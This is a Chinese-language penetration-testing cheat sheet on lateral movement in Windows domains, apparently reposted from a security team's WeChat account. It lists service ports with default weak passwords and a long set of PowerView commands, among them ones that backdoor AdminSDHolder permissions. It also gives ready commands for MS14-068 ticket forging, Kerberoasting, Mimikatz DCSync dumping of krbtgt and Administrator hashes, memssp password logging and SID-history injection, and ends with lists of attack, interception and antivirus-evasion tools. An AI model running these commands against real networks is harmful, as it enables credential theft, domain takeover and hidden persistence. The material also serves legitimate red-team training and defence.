横向渗透方法小结

前言

本文学习并小结下横向渗透的方法

一、端口渗透

1、常见默认端口

（1）web类(web漏洞/敏感目录)

第三方通用组件漏洞: struts、thinkphp、jboss、ganglia、zabbix等

80 web 80-89 web   8000-9090 web

（2）数据库类(扫描弱口令

1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreSQL 50000 DB2

（3）特殊服务类(未授权/命令执行类/漏洞)

443 SSL心脏滴血 445 ms08067/ms11058/ms17010等 873 Rsync未授权 5984 CouchDB http://xxx:5984/_utils/ 6379 redis未授权 7001,7002 WebLogic默认弱口令，反序列 9200,9300 elasticsearch 参考: 多玩某服务器ElasticSearch命令执行漏洞 11211 memcache未授权访问 27017,27018 Mongodb未授权访问 50000 SAP命令执行 50070,50030 hadoop默认端口未授权访问

（4）常用端口类(扫描弱口令/端口爆破)

21 ftp 22 SSH 23 Telnet 445 SMB弱口令扫描 2601,2604 zebra路由，默认密码zebra 3389 远程桌面

（5）端口合计所对应的服务

21 ftp 22 SSH 23 Telnet 25 SMTP 53 DNS 69 TFTP 80 web 80-89 web 110 POP3 135 RPC 139 NETBIOS 143 IMAP 161 SNMP 389 LDAP 443 SSL心脏滴血以及一些web漏洞测试 445 SMB 512,513,514 Rexec 873 Rsync未授权 1025,111 NFS 1080 socks 1158 ORACLE EMCTL2601,2604 zebra路由，默认密码zebra案 1433 MSSQL (暴力破解) 1521 Oracle:(iSqlPlus Port:5560,7778) 2082/2083 cpanel主机管理系统登陆 （国外用较多） 2222 DA虚拟主机管理系统登陆 （国外用较多） 2601,2604 zebra路由，默认密码zebra 3128 squid代理默认端口，如果没设置口令很可能就直接漫游内网了 3306 MySQL （暴力破解） 3312/3311 kangle主机管理系统登陆 3389 远程桌面 3690 svn 4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网 4848 GlassFish web中间件 弱口令:admin/adminadmin 5432 PostgreSQL 5900 vnc 5984 CouchDB http://xxx:5984/_utils/ 6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网 6379 redis未授权 7001,7002 WebLogic默认弱口令，反序列 7778 Kloxo主机控制面板登录 8000-9090 都是一些常见的web端口，有些运维喜欢把管理后台开在这些非80的端口上 8080 tomcat/WDCd/ 主机管理系统，默认弱口令 8080,8089,9090 JBOSS 8081 Symantec AV/Filter for MSE 8083 Vestacp主机管理系统 （国外用较多） 8649 ganglia 8888 amh/LuManager 主机管理系统默认端口 9000 fcgi fcig php执行 9043 websphere[web中间件] 弱口令: admin/admin websphere/ websphere ststem/manager 9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 10000 Virtualmin/Webmin 服务器虚拟主机管理系统 11211 memcache未授权访问 27017,27018 Mongodb未授权访问 28017 mongodb统计页面 50000 SAP命令执行 50060 hadoop 50070,50030 hadoop默认端口未授权访问

2、端口扫描
目标信息


端口的指纹信息（版本信息）


端口所对应运行的服务


常见的默认端口号


尝试弱口令


工具


nmap


masscan


zmap


s扫描器


自写脚本


NC：nc -v -w 2 -z 192.168.1.1 20-1000


hydra


二、域渗透
1、信息搜集
（1）PowerView




Get-NetDomain - gets the name of the current user's domainGet-NetForest - gets the forest associated with the current user's domainGet-NetForestDomains - gets all domains for the current forestGet-NetDomainControllers - gets the domain controllers for the current computer's domainGet-NetCurrentUser - gets the current [domain]usernameGet-NetUser - returns all user objects, or the user specified (wildcard specifiable)Get-NetUserSPNs - gets all user ServicePrincipalNamesGet-NetOUs - gets data for domain organization unitsGet-NetGUIDOUs - finds domain OUs linked to a specific GUIDInvoke-NetUserAdd - adds a local or domain userGet-NetGroups - gets a list of all current groups in the domainGet-NetGroup - gets data for each user in a specified domain groupGet-NetLocalGroups - gets a list of localgroups on a remote host or hostsGet-NetLocalGroup - gets the members of a localgroup on a remote host or hostsGet-NetLocalServices - gets a list of running services/paths on a remote host or hostsInvoke-NetGroupUserAdd - adds a user to a specified local or domain groupGet-NetComputers - gets a list of all current servers in the domainGet-NetFileServers - get a list of file servers used by current domain usersGet-NetShare - gets share information for a specified serverGet-NetLoggedon - gets users actively logged onto a specified serverGet-NetSessions - gets active sessions on a specified serverGet-NetFileSessions - returned combined Get-NetSessions and Get-NetFilesGet-NetConnections - gets active connections to a specific server resource (share)Get-NetFiles - gets open files on a serverGet-NetProcesses - gets the remote processes and owners on a remote server

PowerView-2.0-tricks




# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)#   has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a serverGet-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies toGet-NetOU -GUID <GPP_GUID> | %{ Get-NetComputer -ADSPath $_ }
# get all users with passwords changed > 1 year ago$Date = (Get-Date).AddYears(-1).ToFileTime()Get-NetUser -Filter "(pwdlastset<=$Date)"# all enabled usersGet-NetUser -Filter "(!userAccountControl:1.2.840.113556.1.4.803:=2)"# all disabled usersGet-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"# all users that require smart card authenticationGet-NetUser -Filter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"# all users that don't require smart card authenticationGet-NetUser -Filter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
# enumerate all servers that allow unconstrained delegation, and all users that aren't marked as sensitive/not for delegation$Computers = Get-NetComputer -Unconstrained$Users = Get-NetUser -AllowDelegation -AdminCount
# enumerate servers that allow unconstrained kerberos delegation and show all users logged inInvoke-UserHunter -Unconstrained -ShowAll
# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegationInvoke-UserHunter -Unconstrained -AdminCount -AllowDelegation
# Get the logged on users for all machines in any *server* OU in a particular domainGet-NetOU *server* -Domain <domain> | %{Get-NetComputer -ADSPath $_ | %{Get-NetLoggedOn -ComputerName $_}}
# find all users with an SPN set (likely service accounts)Get-NetUser -SPN
# find all service accounts in "Domain Admins"Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}
# hunt for all privileged users (adminCount=1)Invoke-UserHunter -AdminCount
# find users with sidHistory setGet-NetUser -Filter '(sidHistory=*)'
# enumerate all gobal catalogs in the forestGet-NetForestCatalog
# turn a list of computer short names to FQDNsgc computers.txt | % {Get-NetComputer -ADSpath "GC://GLOBAL.CATALOG" -Filter "(name=$_)"}
# find interesting .vbs/.bat/.ps1 scripts on domain controllersInvoke-FileFinder -SearchSYSVol
# enumerate the current domain policy, optionally specifying a domain to query for or a DC to reflect queries through$DomainPolicy = Get-DomainPolicy [-Domain <DOMAIN>] [-DomainController <DC>]$DomainPolicy.KerberosPolicy # useful for golden tickets ;)$DomainPolicy.SystemAccess
# enumerate the current domain controller policy, resolving SIDs to account names, and seeing who has what rights on DCs by default$DcPolicy = Get-DomainPolicy -Source DC -ResolveSids$DcPolicy.PrivilegeRights
# enumerate what machines that a particular group has local admin rights toFind-GPOLocation -GroupName <GROUP>
# enumerate what machines that a given user in the specified domain has RDP access rights to, reflecting queries through a particular DCFind-GPOLocation -UserName <USER> -Domain <DOMAIN> -DomainController <DC> -LocalGroup RDP
# export a csv of all GPO mappingsFind-GPOLocation | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv
# use alternate credentials for searching for files on the domain$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force$Credential = New-Object System.Management.Automation.PSCredential("DOMAINuser",$Password)Invoke-FileFinder -Domain DOMAIN -Credential $Credential
# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to namesGet-ObjectAcl -SamAccountName matt -Domain testlab.local -ResolveGUIDs
# grant user 'will' the rights to change 'matt's passwordAdd-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName will -Rights ResetPassword
# audit the permissions of AdminSDHolder, resolving GUIDsGet-ObjectACL -ADSPrefix 'CN=AdminSDHolder,CN=System' -ResolveGUIDs
# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuseAdd-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName matt -Rights All
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)Get-ObjectACL -DistinguishedName "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
# find linked DA accounts using name correlationGet-NetGroupMember -GroupName "Domain Admins" | %{ Get-NetUser $_.membername } | %{ $a=$_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)" } | Select-Object -Property displayname,samaccountname
# save a PowerView object to disk for later usageGet-NetUser | Export-Clixml user.out$Users = Import-Clixml user.out
# Find any machine accounts in privileged groupsGet-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?{$_.MemberName -like '*$'}
# Enumerate permissions for GPOs where users have some kind of modify rightsGet-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )}
# find all policies applied to a current machineGet-NetGPO -ComputerName WINDOWS1.testlab.local
# find the user/groups that have read access to the LAPS password property for a specified computerGet-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData |    Select-Object -ExpandProperty distinguishedname |    ForEach-Object { $_.substring($_.indexof('OU')) } | ForEach-Object {        Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_    } | Where-Object {        ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and        ($_.ActiveDirectoryRights -match 'ReadProperty')    } | ForEach-Object {        Convert-NameToSid $_.IdentityReference    } | Select-Object -ExpandProperty SID | Get-ADObject
# get the ACLs for all OUs where someone is allowed to read the LAPS password attributeGet-NetOU -FullData |     Get-ObjectAcl -ResolveGUIDs |     Where-Object {        ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and         ($_.ActiveDirectoryRights -match 'ReadProperty')    } | ForEach-Object {        $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID;        $_    }
# perform a user 'zone transfer' by exporting all AD DNS records from all zones, exporting to a .csvGet-DNSZone | Get-DNSRecord | Export-CSV -NoTypeInformation dns.csv
# return all universal security groups in a forest with foreign membersGet-NetGroup -Filter '(member=*)(groupType=2147483656)' -ADSPath 'GC://testlab.local' -FullData | Select-Object samaccountname,distinguishedname,member | ForEach-Object {    $GroupDomain = $_.distinguishedname.subString($_.distinguishedname.IndexOf("DC="))    $_.Member = $_.Member | ForEach-Object {        $MemberDomain = $_.subString($_.IndexOf("DC="))        if($GroupDomain -ne $MemberDomain) {            $_        }    }    $_} | Where-Object {$_.Member}

PowerView-3.0-tricks




# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:#   Verbs:#       Get : retrieve full raw data sets#       Find : ‘find’ specific data entries in a data set#       Add : add a new object to a destination#       Set : modify a given object#       Invoke : lazy catch-all#   Nouns:#       Verb-Domain* : indicates that LDAP/.NET querying methods are being executed#       Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration#       Verb-Net* : indicates that Win32 API access is being used under the hood

# get all the groups a user is effectively a member of, 'recursing up' using tokenGroupsGet-DomainGroup -MemberIdentity <User/Group>
# get all the effective members of a group, 'recursing down'Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# use an alterate creadential for any function$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('TESTLABdfm.a', $SecPassword)Get-DomainUser -Credential $Cred
# retrieve all the computer dns host names a GPP password applies toGet-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}
# get all users with passwords changed > 1 year ago, returning sam account names and password last set times$Date = (Get-Date).AddYears(-1).ToFileTime()Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
# all enabled users, returning distinguishednamesGet-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishednameGet-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
# all disabled usersGet-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"Get-DomainUser -UACFilter ACCOUNTDISABLE
# all users that require smart card authenticationGet-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"Get-DomainUser -UACFilter SMARTCARD_REQUIRED
# all users that *don't* require smart card authentication, only returning sam account namesGet-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountnameGet-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname
# use multiple identity types for any *-Domain* function'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
# find all users with an SPN set (likely service accounts)Get-DomainUser -SPN
# check for users who don't have kerberos preauthentication setGet-DomainUser -PreauthNotRequiredGet-DomainUser -UACFilter DONT_REQ_PREAUTH
# find all service accounts in "Domain Admins"Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}
# find users with sidHistory setGet-DomainUser -LDAPFilter '(sidHistory=*)'
# find any users/computers with constrained delegation stGet-DomainUser -TrustedToAuthGet-DomainComputer -TrustedToAuth
# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation$Computers = Get-DomainComputer -Unconstrained$Users = Get-DomainUser -AllowDelegation -AdminCount
# return the local *groups* of a remote serverGet-NetLocalGroup SERVER.domain.local
# return the local group *members* of a remote server using Win32 API methods (faster but less info)Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local
# Kerberoast any users in a particular OU with SPNs setInvoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
# Find-DomainUserLocation == old Invoke-UserHunter# enumerate servers that allow unconstrained Kerberos delegation and show all users logged inFind-DomainUserLocation -ComputerUnconstrained -ShowAll
# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegationFind-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
# find all computers in a given OUGet-DomainComputer -SearchBase "ldap://OU=..."
# Get the logged on users for all machines in any *server* OU in a particular domainGet-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}}
# enumerate all gobal catalogs in the forestGet-ForestGlobalCatalog
# turn a list of computer short names to FQDNs, using a global cataloggc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}
# enumerate the current domain controller policy$DCPolicy = Get-DomainPolicy -Policy DC$DCPolicy.PrivilegeRights # user privilege rights on the dc...
# enumerate the current domain policy$DomainPolicy = Get-DomainPolicy -Policy Domain$DomainPolicy.KerberosPolicy # useful for golden tickets ;)$DomainPolicy.SystemAccess # password age/etc.
# enumerate what machines that a particular user/group identity has local admin rights to#   Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocationGet-DomainGPOUserLocalGroupMapping -Identity <User/Group>
# enumerate what machines that a given user in the specified domain has RDP access rights toGet-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP
# export a csv of all GPO mappingsGet-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv
# use alternate credentials for searching for files on the domain#   Find-InterestingDomainShareFile == old Invoke-FileFinder$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force$Credential = New-Object System.Management.Automation.PSCredential("DOMAINuser",$Password)Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential
# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to namesGet-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local
# grant user 'will' the rights to change 'matt's passwordAdd-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
# audit the permissions of AdminSDHolder, resolving GUIDsGet-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuseAdd-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
# find linked DA accounts using name correlationGet-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname}
# save a PowerView object to disk for later usageGet-DomainUser | Export-Clixml user.xml$Users = Import-Clixml user.xml
# Find any machine accounts in privileged groupsGet-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}
# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rightsGet-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}
# find all policies applied to a current machineGet-DomainGPO -ComputerIdentity windows1.testlab.local
# enumerate all groups in a domain that don't have a global scope, returning just group namesGet-DomainGroup -GroupScope NotGlobal -Properties name
# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships#   query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]d{2,}$'} | Select-Object -ExpandProperty distinguishedname$Domains = @{}$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {    # extract the domain the foreign user was added to    $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'    # check if we've already enumerated this domain    if (-not $Domains[$ForeignUserDomain]) {        $Domains[$ForeignUserDomain] = $True        # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set        $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"        Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member    }}$ForeignMemberships | fl
# if running in -sta mode, impersonate another credential a la "runas /netonly"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('TESTLABdfm.a', $SecPassword)Invoke-UserImpersonation -Credential $Cred# ... actionInvoke-RevertToSelf
# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputerGet-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
# set the specified property for the given user identitySet-DomainObject testuser -Set @{'mstsinitialprogram'='\EVILprogram.exe'} -Verbose
# Set the owner of 'dfm' in the current domain to 'harmj0y'Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {    ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')}
# check if any user passwords are set$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl

（2）获取某OU下所有机器信息




{            "name": "Find the specificed OU computers",            "queryList": [                {                    "final": false,                    "title": "Select a OU...",                    "query": "MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC"                },                {                    "final": true,                    "query": "MATCH (m:OU  {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]->(n:Computer) RETURN p",                    "allowCollapse": true,                    "endNode": "{}"                }            ]        }

（3）自动标记owned用户及机器


SyncDog


（4）获取域内DNS信息


adidnsdump


域渗透——DNS记录的获取


2、获取域控
（1）SYSVOL
SYSVOL是指存储域公共文件服务器副本的共享文件夹，它们在域中所有的域控制器之间复制。Sysvol文件夹是安装AD时创建的，它用来存放GPO、Script等信息。同时，存放在Sysvol文件夹中的信息，会复制到域中所有DC上
可参考：


寻找SYSVOL里的密码和攻击GPP（组策略偏好）


Windows Server 2008 R2之四管理Sysvol文件夹


获取AD域中SYSVOL和组策略首选项中的密码


利用SYSVOL还原组策略中保存的密码


Finding Passwords in SYSVOL & Exploiting Group Policy Preferences


（2）MS14-068 Kerberos




python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机

利用mimikatz将工具得到的[email protected]写入内存，创建缓存证书：




mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exitnet use k: pentest.comc$

参考：


MS14-068域提权漏洞复现


Kerberos的工具包PyKEK


深入解读MS14-068漏洞


Kerberos的安全漏洞


（3）SPN扫描
Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据，无需向目标系统发送任何数据包
SPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类，主机名和端口组成。在使用Kerberos身份验证的网络中，必须在内置计算机帐户（如NetworkService或LocalSystem）或用户帐户下为服务器注册SPN。对于内部帐户，SPN将自动进行注册。但是，如果在域用户帐户下运行服务，则必须为要使用的帐户的手动注册SPN
SPN扫描的主要好处是：SPN扫描不需要连接到网络上的每个IP来检查服务端口，SPN通过LDAP查询向域控执行服务发现，SPN查询是Kerberos的票据行为一部分，因此比较难检测SPN扫描
参考：


非扫描式的SQL Server发现


SPN扫描


PowerShell-AD-Recon


（4）Kerberos的黄金票据和白银票据
黄金票据和白银票据的一些区别：


Golden Ticket伪造TGT，可以获取任何Kerberos服务权限；银票伪造TGS，只能访问指定的服务


加密方式不同：Golden Ticket由krbtgt的hash加密；Silver Ticket由服务账号（通常为计算机账户）Hash加密


认证流程不同：金票在使用的过程需要同域控通信；银票在使用的过程不需要同域控通信


参考：


一文了解黄金票据和白银票据


Kerberos Golden Tickets are Now More Golden


内网安全之域服务账号破解实践


kerberos认证原理—讲的非常细致，易懂


攻击者如何使用Kerberos的银票来利用系统


域渗透——Pass The Ticket


（5）域服务账号破解
与上面SPN扫描类似的原理
工具：https://github.com/nidem/kerberoast
#获取所有用作SPN的帐户setspn -T PENTEST.com -Q */*#从Mimikatz的RAM中提取获得的门票kerberos::list /export#用rgsrepcrack破解tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

（6）NTLM relay
参考：


跟着玄武大佬学NTLM relay攻防


内网渗透测试：NTLM Relay攻击分析


One API call away from Domain Admin


privexchange


Exchange2domain


用于主动让目标机器发起NTLM请求的方法：


printerbug


PetitPotam


Relay LDAP:


CVE-2019-1040-dcpwn


Relay AD CS/PKI:


AD CS/PKI template exploit


（7）Kerberos委派


Wagging-the-Dog.html


s4u2pwnage


Attacking Kerberos Delegation


用打印服务获取域控


Computer Takeover


Combining NTLM Relaying and Kerberos delegation


CVE-2019-1040


（8）地址解析协议
实在搞不定再搞ARP
可参考：


一文搞明白ARP


一文了解ARP欺骗


ZeroLogon(CVE-2020-1472)：


mimikatz利用zerologon攻击域控服务器相关命令（附蓝队自查方案


ZeroLogon(CVE-2020-1472) 漏洞的攻击与防御策略（上）


ZeroLogon(CVE-2020-1472) 漏洞的攻击与防御策略（下）


3、获取AD哈希
参考：


How Attackers Dump Active Directory Database Credentials


从NTDS.dit获取密码哈希值的三种方法


域渗透——获得域控服务器的NTDS.dit文件


Invoke-NinaCopy


方法：


使用VSS卷影副本


Ntdsutil中获取NTDS.DIT文件


PowerShell中提取NTDS.DIT


使用Mimikatz提取：mimikatz lsadump::lsa /inject exit


使用Mimikatz的DCSync远程转储Active Directory凭证
提取 KRBTGT用户帐户的密码数据：Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user：krbtgt"exit
管理员用户帐户提取密码数据：Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user：Administrator" exit


NTDS.dit中提取哈希：使用esedbexport恢复以后使用ntdsxtract提取


4、AD持久化
（1）活动目录持久性技巧
参考：


Sneaky Active Directory Persistence Tricks


巧用DSRM密码同步将域控权限持久化


DCShadow：一种新型AD攻击技术


（2）Security Support Provider
参考：域渗透——Security Support Provider – 三好学生
Security Support Provider，直译为安全支持提供者，又名Security Package。简单的理解为SSP就是一个DLL，用来实现身份认证




privilege::debugmisc::memssp

这样就不需要重启c:/windows/system32可看到新生成的文件kiwissp.log
（3）SID历史记录
参考：Sneaky Active Directory Persistence #14: SID History
允许另一个帐户的访问被有效地克隆到另一个帐户




mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator"

（4）组策略
参考：


Sneaky Active Directory Persistence #17: Group Policy


【技术分享】BadGPO：组策略对象在持久化及横向渗透中的应用


（5）Hook PasswordChangeNotify


域渗透——Hook PasswordChangeNotify – 三好学生


（6）Kerberoasting后门


域渗透-Kerberoasting


（7）AdminSDHolder


Backdooring AdminSDHolder for Persistence


利用AdminSDHolder进行权限维持


域渗透中的AdminSDHolder


（8）Delegation


Unconstrained Domain Persistence


5、其他
（1）exchange


Exchange2domain


CVE-2018-8581


CVE-2019-1040


CVE-2020-0688


NtlmRelayToEWS


ewsManage


CVE-2021-26855


CVE-2021-28482


（2）TIPs


《域渗透——Dump Clear-Text Password after KB2871997 installed》


《域渗透——Hook PasswordChangeNotify》
可通过Hook PasswordChangeNotify实时记录域控管理员的新密码


《域渗透——Local Administrator Password Solution》
域渗透时要记得留意域内主机的本地管理员账号


《域渗透——利用SYSVOL还原组策略中保存的密码》


（3）工具


BloodHound


SharpAddDomainMachine


CrackMapExec


DeathStar


三、远程执行


at命令


psexec


WMIC


Wmiexec


Smbexec


Powershell remoting


DCOM


Winrm


四、IoT


路由器 routersploit


打印机 PRET


IOT exp


OWASP-Nettacker


isf


icsmaster


五、中间人


Cain


Ettercap


Responder


MITMf


bettercap


六、规避杀软
1、bypass applocker


UltimateAppLockerByPassList


LOLBAS


GTFOBins


2、bypassAV


Empire


PEspin


Shellter


Ebowla


Veil


代码注入技术Process Doppelgänging


结语
整理了横向渗透方法







红客突击队于2019年由队长k龙牵头，联合国内多位顶尖高校研究生成立。其团队从成立至今多次参加国际网络安全竞赛并取得良好成绩，积累了丰富的竞赛经验。团队现有三十多位正式成员及若干预备人员，下属联合分队数支。红客突击队始终秉承先做人后技术的宗旨，旨在打造国际顶尖网络安全团队。



原文始发于微信公众号（红客突击队）：横向渗透方法小结